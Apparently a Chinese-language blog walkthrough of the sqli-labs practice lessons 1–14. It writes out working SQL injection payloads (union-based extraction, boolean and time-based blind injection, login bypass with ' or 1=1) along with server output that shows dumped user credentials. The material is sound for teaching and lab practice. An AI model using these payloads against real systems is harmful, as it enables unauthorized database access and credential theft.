less-1:

1.采用二分法进行猜列:
http://192.236.147.191:30000/Less-1/?id=1' order by 10--+
Welcome    Dhakkan
Unknown column '10' in 'order clause'
//出现错误
2........之后发现该数据只存在三列
http://192.236.147.191:30000/Less-1/?id=1' order by 3--+
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb
3........已知存在三列
采用http://192.236.147.191:30000/Less-1/?id=1' union select 1,2,3--+
//“union”联合的意思,把两次或多次查询结果合并起来
进行回显;发现句子正确数据却没有任何回显信息.......
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb
4.将id=1用“-”注释使“id=1”不被执行
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,3--+
此时发现用户名和密码显示为:
                       Welcome    Dhakkan
Your Login name:2
Your Password:3
 
5.查库:
http://192.236.147.191:30000/Less-1/id=-1' union select 1,2, group_concat(schema_name) from information_schema.schemata--+
Welcome    Dhakkan
Your Login name:2
YourPassword:information_schema,challenges,mysql,performance_schema,security
 
6.查表--表于security:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ //“security”转为16进制
Welcome    Dhakkan
Your Login name:2
Your Password:emails,referers,uagents,users
 
7.查列--列为users:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+//“0x”转换十六进制及将“user”转换为16进制
Welcome    Dhakkan
Your Login name:2
Your Password:id,username,password
破解出该用户的“id”,“usernmae”,“password”
 
8.在“security”取出“username”数据:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(username) from security.users--+
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
 
9.在“security”取出“password”数据:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(password) from security.users--+
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
 
10.同时在“security”取出“username”和“password”的数据:
http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users--+
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
小结:
1 查库:select schema_name from information_schema.schemata
2 查表: select table_name from information_schema.tables where table_schema='security'
3 查列: select column_name from information_schema.columns where table_name='users'
5 查字段: select username,password from security.users
less-2:
 
步骤同上,把单引号“ ’ ”去除。
最后结果为:
Welcome    Dhakkan
Your Login name:2
Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
 
less-3:
 
在“less-1”的基础上 加上字符括号 “(”
及:“ -1') ”
 
less-4:
 
将“less-3”单引号“ ' ”改为双引号“ " ”
及:“ -1") ”
 
less-5:
盲注型
1、http://192.236.147.191:30000/Less-1/?id=1 回显的结果:
Welcome    Dhakkan
You are in...........
 
2、http://192.236.147.191:30000/Less-5/?id=1' 回显的结果:
Welcome    Dhakkan
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
 
3、查看有多少列:
http://192.236.147.191:30000/Less-5/?id=1' order by 3--+
Welcome    Dhakkan
You are in...........
此时正确返回为:“you are in..........”
 
4、(1)对当前数据库第一个字母进行不断猜解尝试:(题型不同不在是union selcet)
http://192.236.147.191:30000/Less-5/?id=1' and left((select database()),1)='s'--+
正确回显信息:
              Welcome    Dhakkan
You are in...........
表明:猜想正确
猜解出第一位为“ s ”
(2)对当前数据库第二个字母进行不断猜解尝试:
?id=1' and left((select database()),2)='se'--+
————回显正确
猜解出第二位为“ e”
.......
(.)依次猜解可知数据库为“ security ”
 
此方法不不仅慢还不实用
此时运用web渗透的“瑞士军刀”: Burpsuite
运用“Burpsuite”可得数据库为:security
 
less-6:
与第五题一样把单引号换为双引号“ " ”
 
less-7:
运用中国菜刀
 
less-8:
法一:布尔盲注 和第六题一样
法二:
时间延迟盲注:
(1):使用延迟的方法:
http://192.236.147.191:30000/Less-8/
?id=1' and sleep(5)--+
(2): 判断字符长度:
http://192.236.147.191:30000/Less-8/?id=1' and if (length(database())=8,1,sleep(5))--+
当数据库长度为8时数据加载很快,但不为8时加载很慢且延迟为5s左右。
 
 
less-9&less-10:
 
都是时间盲注
 
 
less-11:
Welcome   Dhakkan
Username :    
Password :    
 
1.寻找漏洞:
(1) 在输入admin、admin;显示登陆成功;
 
(2) 均在username输入“ ' ”出现:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and password='' LIMIT 0,1' at line 1
说明“ ' ”存在漏洞
 
(3) 此时注释漏洞:“ admin' # ”
回显登陆成功:
Your Login name:admin
Your Password:admin
 
(4) 舍去admin输入“ ' # ”时出现错误
此时输入“ ' or 1=1 # ”回显登陆成功
 
2、查列:
(1)“ ' or 1=1 order by 2 # ” 回显成功只存在两列
 
(2)“ ' union select 1,2 # ” 回显:
Your Login name:1
Your Password:2
 
3、查库:
(1)“ ' union select 1, database() ”查当前数据库;回显:
Your Login name:1
Your Password:security
数据库为:security
 
(2)“ ' union select 1, group_concat(shcema_name) from information_schema.schemata # ” 查所有数据库:回显:
Your Login name:1
Your Password:information_schema,challenges,mysql,performance_schema,security
 
4、查表于security中:
(1)“ ' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' # ” 在 "security" 查所有表;回显:
Your Login name:1
Your Password:emails,referers,uagents,users
 
5、查列于users中:
“ ' union select 1, group_concat(column_name) from information_schema.columns where table_name='users' # ” 查所有列;回显:
Your Login name:1
Your Password:id,username,password
 
 
6、取出“username” “paasord” 数据:
“ ' union select 1,group_concat(concat_ws('~',username,password)) from security.users # ” 回显:
Your Login name:1
Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
 
 
less-12 :
") #
 
less-13:
 
ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #
 
1、经猜解漏洞为:“ ') # ”
 
2、查数据库
此题不同上题查询库是没有回显,因此采用布尔盲注;
(1) ') or if(length(database())>1,1,sleep(5)) # ——判断数据库长度是否大于1如果是短时间回显,如果不是睡眠5秒后回显;
此时回显成功
..........
') or if(length(database())=8,1,sleep(5)) # ———经猜解数据库长度为8;
 
(2)') or left(database(),1)='s' # ——回显成功,说明数据库首字母为s
第二位:') or left(database(),2)='se' # ——第二位为e;
..........
因此数据库为:“ security ”
 
3、查表
运用burp suite 暴力破解
(1)
ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #
————information..
 
 
less-14:
1、漏洞为:admin'"
2、查库同上:
由burp suite 可查得数据库
 
3、查表:
(1) '" or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='a' # ——表为:uses
.........
 
4、查列:
'" or left((select column_name from information_schema.column where table_name='users' limit 0,1),1)='p' #

sql-labs 1-14的更多相关文章

  1. [SQL基础教程]1-4 SQL 表的创建

    [SQL基础教程]1-4 SQL 表的创建 创建数据库 语法 CREATE DATABASE <数据库名称> // example CREATE DATABASE shop; 创建表 语法 ...

  2. 在论坛中出现的比较难的sql问题:14(存储过程问题 存储过程参数、存储过程内的参数)

    原文:在论坛中出现的比较难的sql问题:14(存储过程问题 存储过程参数.存储过程内的参数) 最近,在论坛中,遇到了不少比较难的sql问题,虽然自己都能解决,但发现过几天后,就记不起来了,也忘记解决的 ...

  3. java web数据库(SQL 2008+IDEA 14)环境配置

    废话少说,在之前已经配置过IDEA+Tomcat的环境之后,现在需要进行数据库配置: 1.首先,SQL SERVER2008数据库的安装 (1)将下载的sqlserver 2008数据库进行解压,点击 ...

  4. SQL Serever学习14——存储过程和触发器

    存储过程 在数据库中很多查询都是大同小异,编写他们费时费力,将他们保存起来,以后执行就很方便了,把SQL语句“封装”起来. 存储过程的概念 存储过程是一组SQL语句集,经过编译存储,可以”一次编译,多 ...

  5. SQL Labs刷题补坑记录(less31-less53)

    LESS31: 双引号直接报错,那么肯定可以报错注入,并且也过滤了一些东西,^异或没有过滤,异或真香 -1" and (if(length(database())=8,1,0)) and & ...

  6. SQL Labs刷题补坑记录(less1-less30)

    补坑加1,这几天快速刷一下sqllabs 来巩固下sql注入基础吧,也算是把很久以前没刷的过一遍,do it! 第一部分: LESS1: 直接报错,有回显的注入, http://localhost/s ...

  7. SQL Labs刷题补坑记录(less54-less65)

    LESS54: 只有10次尝试,dump处secret key 直接union 查就可以,括号为单引号闭合 LESS55: 尝试出来闭合的方式为)括号,后面操作与54相同 LESS56: 尝试出来括号 ...

  8. Mysql常用sql语句(14)- 多表查询

    测试必备的Mysql常用sql语句,每天敲一篇,每次敲三遍,每月一循环,全都可记住!! https://www.cnblogs.com/poloyy/category/1683347.html 前言 ...

  9. sql 视图 按where条件多个字段取一个 分类: SQL Server 2014-12-01 14:09 308人阅读 评论(0) 收藏

    首先介绍一下 Case ..When...Then..End  的用法: CASEJiXiaoFind_RowID  WHEN '1' THENJiXiao_Money1  WHEN '2' THEN ...

  10. SQL ID自增列从1开始重新排序 分类: SQL Server 2014-05-19 14:46 652人阅读 评论(0) 收藏

    数据库中把ID自增长重置成1: 一般做法:(太麻烦) 复制表数据->删除原表.新建一张表->粘贴: 新方法: 数据库中:新建查询->复制.粘贴一下代码->修改表名,执行即可(先 ...

随机推荐

  1. day02 web主流框架

    day02 web主流框架 今日内容概要 手写简易版本web框架 借助于wsgiref模块 动静态网页 jinja2模板语法 前端.web框架.数据库三种结合 Python主流web框架 django ...

  2. 静态库动态库的编译、链接, binutils工具集, 代码段\数据段\bss段解释

    #1. 如何使用静态库 制作静态库 (1)gcc *.c -c -I../include得到o文件 (2) ar rcs libMyTest.a *.o 将所有.o文件打包为静态库,r将文件插入静态库 ...

  3. hadoop/spark面试题

    总结于网络 转自:https://www.cnblogs.com/jchubby/p/5449379.html 1.简答说一下hadoop的map-reduce编程模型 首先map task会从本地文 ...

  4. 商业爬虫学习笔记day3

    一. 付费代理发送请求的两种方式 第一种方式: (1)代理ip,形式如下: money_proxy = {"http":"username:pwd@192.168.12. ...

  5. C++构造函数和析构函数初步认识

    构造函数 1.构造函数与类名相同,是特殊的公有成员函数.2.构造函数无函数返回类型说明,实际上构造函数是有返回值的,其返回值类型即为构造函数所构建到的对象.3.当新对象被建立时,构造函数便被自动调用, ...

  6. MBean代码例子

    public class ServerImpl { public final long startTime; public ServerImpl() { startTime = System.curr ...

  7. Oracle trunc和round的区别

    1.关于trunc 和round函数比较 整体概括: round函数 四舍五入trunc函数 直接截取 对于时间: Round函数对日期进行"四舍五入",Trunc函数对日期进行截 ...

  8. Bitmaps与优化

    1.有效的处理较大的位图 图像有各种不同的形状和大小.在许多情况下,它们往往比一个典型应用程序的用户界面(UI)所需要的资源更大. 读取一个位图的尺寸和类型: 为了从多种资源来创建一个位图,Bitma ...

  9. mysql之对象创建

    1 --创建表空间 2 create tablespace tablespace_name 3 innodb and ndb: 4 add datafile 'file_name' 5 innodb ...

  10. Google Guava 常用集合方法

    /** * Author: momo * Date: 2018/6/7 * Description: */ public class ListTest { public static void mai ...